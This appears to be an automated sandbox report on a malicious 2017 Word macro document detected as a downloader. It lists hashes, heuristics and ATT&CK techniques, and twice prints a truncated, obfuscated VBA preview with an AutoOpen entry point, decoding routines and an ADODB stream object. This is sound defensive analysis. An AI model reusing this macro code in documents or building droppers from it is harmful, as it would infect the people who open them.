Office (OLE) malware analysis — malicious · f360bb4e19e9cd37

MALICIOUS

Office (OLE)

164.0 KB Created: 2017-05-04 12:19:00 Authoring application: Microsoft Office Word First seen: 2017-05-13

MD5: 927cc06f4f82c9510ec831212eee1f5f SHA-1: ae242425fee09659d6f3fa0994abb7a02a16552f SHA-256: f360bb4e19e9cd374b93ed154f4513f0e1c97082c1aeba12bb79c65284776478

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The presence of a Shell() call and CreateObject() indicates the macro attempts to run external commands or create objects to facilitate payload execution. ClamAV also detected this as a downloader with macros.

Heuristics 8

ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17780 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	17780 bytes
SHA-256: `6ec0d68961d7b3da5a4bd59db242a0e55e29f352f6e28809cee98cb0a28ca7e4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub AutoOpen() Dim EyuKB As Double EyuKB = Int(7155.0695282082) Dim sIPemb As Boolean sIPemb = False Dim RedAQ As Byte RedAQ = 69 lJp0BztCS End Sub Attribute VB_Name = "Module2" Public Function pD07K(ByVal YX4mScirl) Dim U37wJq5pL As Integer U37wJq5pL = 30167 Dim M70dPoG As Byte M70dPoG = 49 Dim avuBy5GzD As Double avuBy5GzD = Int(62736.12786833) Dim DNJ3Fwy As Single DNJ3Fwy = Round(51593.969091864) Dim gzeEjOIhx As Long gzeEjOIhx = Sgn(0) Dim Q2yMl Dim v2fWnPY Dim r1D8I As String r1D8I = AscW("u") Dim ZDtfTCg As Single ZDtfTCg = Int(44944.131202165) Dim zI8LiKk As Single zI8LiKk = Int(60092.79856303) Dim UDuWZ As Integer UDuWZ = Sgn(1046) Dim CfsU9rh As Boolean CfsU9rh = False Dim QhLHR2PV As Integer QhLHR2PV = Sgn(-27507) Dim BE3bX9eUB BE3bX9eUB = StrConv(C8nqcB, vbLowerCase) Dim yjoLZ2s As Double yjoLZ2s = 30409.024380945 Dim AMZhGrIc9 As Integer AMZhGrIc9 = Sgn(2244) Dim dK5Uh1p2k As Double dK5Uh1p2k = Int(56292.89730527) Dim syQtY As Byte syQtY = 197 Set Q2yMl = CreateObject(I9iYFc) Dim yVEPrJ As Single yVEPrJ = Sgn(26878.767270423) Dim zb01jQxRI As Double zb01jQxRI = Sgn(34549.206252749) Dim HPqW4cVx HPqW4cVx = StrConv(IyJzhMd, vbProperCase) Set v2fWnPY = Q2yMl.CreateElement(u3YLPxnBu) Dim NpdhGilXB As Boolean NpdhGilXB = True Dim oJ4oAlL7r As Double oJ4oAlL7r = Val(65250.821071462) Dim dNrVdK45 dNrVdK45 = AscW("1") Dim Kxc52dpSG As Single Kxc52dpSG = 60403.714481528 Dim PuFr9 As Long PuFr9 = 0 With v2fWnPY Dim VnwAt0DS As Double VnwAt0DS = 32680.922759321 Dim UjZOMpGd As Double UjZOMpGd = 52988.725343602 v2fWnPY.DataType = "bin." & u3YLPxnBu Dim W2l0hxwMb As Byte W2l0hxwMb = 163 Dim sMhzVrm7i As Boolean sMhzVrm7i = False Dim uUiyp As Single uUiyp = Fix(21184.631437465) Dim LUHmfEit As Double LUHmfEit = Round(4108.0022929595) Dim H0lSK As Long H0lSK = 0 v2fWnPY.Text = YX4mScirl End With Dim ZiHV9yvz As Long ZiHV9yvz = Sgn(0) Dim zjkaxp4Pu As Byte zjkaxp4Pu = 70 Dim FVvqOzN As Boolean FVvqOzN = True Dim aluOvPqN As Long aluOvPqN = Sgn(0) Dim MECWJk As Boolean MECWJk = True pD07K = TzhtX6L(v2fWnPY.nodeTypedValue) Dim IfT9lqM As Long IfT9lqM = 0 Dim LuLYCSUh As Double LuLYCSUh = Round(10041.912183696) Dim ZbH8PwAih As Integer ZbH8PwAih = Sgn(-2677) Dim wfHAt As Integer wfHAt = Sgn(31867) Dim IrGPni As Single IrGPni = Sgn(58774.772984589) Dim AqyLVSDs As Byte AqyLVSDs = 83 Set v2fWnPY = Nothing Set Q2yMl = Nothing End Function Function TzhtX6L(Binary) Dim KYlumveVK As Boolean KYlumveVK = False Dim XWulaBKnM As Byte XWulaBKnM = 98 Dim fKMQt1DWr As Double fKMQt1DWr = Sgn(47738.889475349) Dim eEsqo As Integer eEsqo = Sgn(-31660) Dim umWd7XJ As Single umWd7XJ = 45357.506924766 Const EJnXm2 = 2 Const J3ZE1wL = 1 Dim KdLxCbom8 As Single KdLxCbom8 = Val(59179.110453745) Dim AwcZM As String AwcZM = UCase(qjXvgoe) Dim Vnrg2 As Long Vnrg2 = 0 Dim klmCBbz As Byte klmCBbz = 154 Dim UkDogztxQ As Boolean UkDogztxQ = False Dim wr7cxAbM As Boolean wr7cxAbM = True Dim qvqwK Dim vj0Gw As Long vj0Gw = Sgn(0) Dim yIqrbCEJ As Integer yIqrbCEJ = -18650 Dim l1GWibtaT As Integer l1GWibtaT = Sgn(24507) Dim f7tBgX As Single f7tBgX = Val(22004.302576695) Dim UyAXH As Integer UyAXH = Sgn(8531) Dim t8ovQREsZ As Single t8ovQREsZ = 4268.9831173046 Dim URafsFJ As Integer URafsFJ = 4285 Dim yuyX641xd As Boolean yuyX641xd = True Dim ID0GI As Double ID0GI = Sgn(54707.444007013) Dim VI8vhwCF As String VI8vhwCF = Len(dRNbDB) Set qvqwK = CreateObject("adodb.stream") Dim zGWvgz1O As String zGWvgz1O = Val("j") Dim Lk4zqeId As Single Lk4zqeId = 21348.194528386 Dim csITcO As Boolean csITcO = True Dim TNjFi8h As Integer TNjFi8h = -16702 Dim Mt064VZ As Boolean Mt064VZ = False ... (truncated)

SHA-256: 6ec0d68961d7b3da5a4bd59db242a0e55e29f352f6e28809cee98cb0a28ca7e4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim EyuKB As Double
EyuKB = Int(7155.0695282082)
Dim sIPemb As Boolean
sIPemb = False
Dim RedAQ As Byte
RedAQ = 69
lJp0BztCS
End Sub

Attribute VB_Name = "Module2"
Public Function pD07K(ByVal YX4mScirl)

Dim U37wJq5pL As Integer
U37wJq5pL = 30167
Dim M70dPoG As Byte
M70dPoG = 49
Dim avuBy5GzD As Double
avuBy5GzD = Int(62736.12786833)
Dim DNJ3Fwy As Single
DNJ3Fwy = Round(51593.969091864)
Dim gzeEjOIhx As Long
gzeEjOIhx = Sgn(0)
Dim Q2yMl
Dim v2fWnPY
Dim r1D8I As String
r1D8I = AscW("u")
Dim ZDtfTCg As Single
ZDtfTCg = Int(44944.131202165)
Dim zI8LiKk As Single
zI8LiKk = Int(60092.79856303)
Dim UDuWZ As Integer
UDuWZ = Sgn(1046)
Dim CfsU9rh As Boolean
CfsU9rh = False
Dim QhLHR2PV As Integer
QhLHR2PV = Sgn(-27507)
Dim BE3bX9eUB
BE3bX9eUB = StrConv(C8nqcB, vbLowerCase)
Dim yjoLZ2s As Double
yjoLZ2s = 30409.024380945
Dim AMZhGrIc9 As Integer
AMZhGrIc9 = Sgn(2244)
Dim dK5Uh1p2k As Double
dK5Uh1p2k = Int(56292.89730527)
Dim syQtY As Byte
syQtY = 197
Set Q2yMl = CreateObject(I9iYFc)
Dim yVEPrJ As Single
yVEPrJ = Sgn(26878.767270423)
Dim zb01jQxRI As Double
zb01jQxRI = Sgn(34549.206252749)
Dim HPqW4cVx
HPqW4cVx = StrConv(IyJzhMd, vbProperCase)
Set v2fWnPY = Q2yMl.CreateElement(u3YLPxnBu)

Dim NpdhGilXB As Boolean
NpdhGilXB = True
Dim oJ4oAlL7r As Double
oJ4oAlL7r = Val(65250.821071462)
Dim dNrVdK45
dNrVdK45 = AscW("1")
Dim Kxc52dpSG As Single
Kxc52dpSG = 60403.714481528
Dim PuFr9 As Long
PuFr9 = 0
With v2fWnPY

Dim VnwAt0DS As Double
VnwAt0DS = 32680.922759321
Dim UjZOMpGd As Double
UjZOMpGd = 52988.725343602
v2fWnPY.DataType = "bin." & u3YLPxnBu

Dim W2l0hxwMb As Byte
W2l0hxwMb = 163
Dim sMhzVrm7i As Boolean
sMhzVrm7i = False
Dim uUiyp As Single
uUiyp = Fix(21184.631437465)
Dim LUHmfEit As Double
LUHmfEit = Round(4108.0022929595)
Dim H0lSK As Long
H0lSK = 0
v2fWnPY.Text = YX4mScirl
End With
Dim ZiHV9yvz As Long
ZiHV9yvz = Sgn(0)
Dim zjkaxp4Pu As Byte
zjkaxp4Pu = 70
Dim FVvqOzN As Boolean
FVvqOzN = True
Dim aluOvPqN As Long
aluOvPqN = Sgn(0)
Dim MECWJk As Boolean
MECWJk = True
pD07K = TzhtX6L(v2fWnPY.nodeTypedValue)

Dim IfT9lqM As Long
IfT9lqM = 0
Dim LuLYCSUh As Double
LuLYCSUh = Round(10041.912183696)
Dim ZbH8PwAih As Integer
ZbH8PwAih = Sgn(-2677)
Dim wfHAt As Integer
wfHAt = Sgn(31867)
Dim IrGPni As Single
IrGPni = Sgn(58774.772984589)
Dim AqyLVSDs As Byte
AqyLVSDs = 83
Set v2fWnPY = Nothing
Set Q2yMl = Nothing
End Function
Function TzhtX6L(Binary)

Dim KYlumveVK As Boolean
KYlumveVK = False
Dim XWulaBKnM As Byte
XWulaBKnM = 98
Dim fKMQt1DWr As Double
fKMQt1DWr = Sgn(47738.889475349)
Dim eEsqo As Integer
eEsqo = Sgn(-31660)
Dim umWd7XJ As Single
umWd7XJ = 45357.506924766
Const EJnXm2 = 2
Const J3ZE1wL = 1
Dim KdLxCbom8 As Single
KdLxCbom8 = Val(59179.110453745)
Dim AwcZM As String
AwcZM = UCase(qjXvgoe)
Dim Vnrg2 As Long
Vnrg2 = 0
Dim klmCBbz As Byte
klmCBbz = 154
Dim UkDogztxQ As Boolean
UkDogztxQ = False
Dim wr7cxAbM As Boolean
wr7cxAbM = True
Dim qvqwK
Dim vj0Gw As Long
vj0Gw = Sgn(0)
Dim yIqrbCEJ As Integer
yIqrbCEJ = -18650
Dim l1GWibtaT As Integer
l1GWibtaT = Sgn(24507)
Dim f7tBgX As Single
f7tBgX = Val(22004.302576695)
Dim UyAXH As Integer
UyAXH = Sgn(8531)

Dim t8ovQREsZ As Single
t8ovQREsZ = 4268.9831173046
Dim URafsFJ As Integer
URafsFJ = 4285
Dim yuyX641xd As Boolean
yuyX641xd = True
Dim ID0GI As Double
ID0GI = Sgn(54707.444007013)
Dim VI8vhwCF As String
VI8vhwCF = Len(dRNbDB)
Set qvqwK = CreateObject("adodb.stream")
Dim zGWvgz1O As String
zGWvgz1O = Val("j")
Dim Lk4zqeId As Single
Lk4zqeId = 21348.194528386
Dim csITcO As Boolean
csITcO = True
Dim TNjFi8h As Integer
TNjFi8h = -16702
Dim Mt064VZ As Boolean
Mt064VZ = False
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.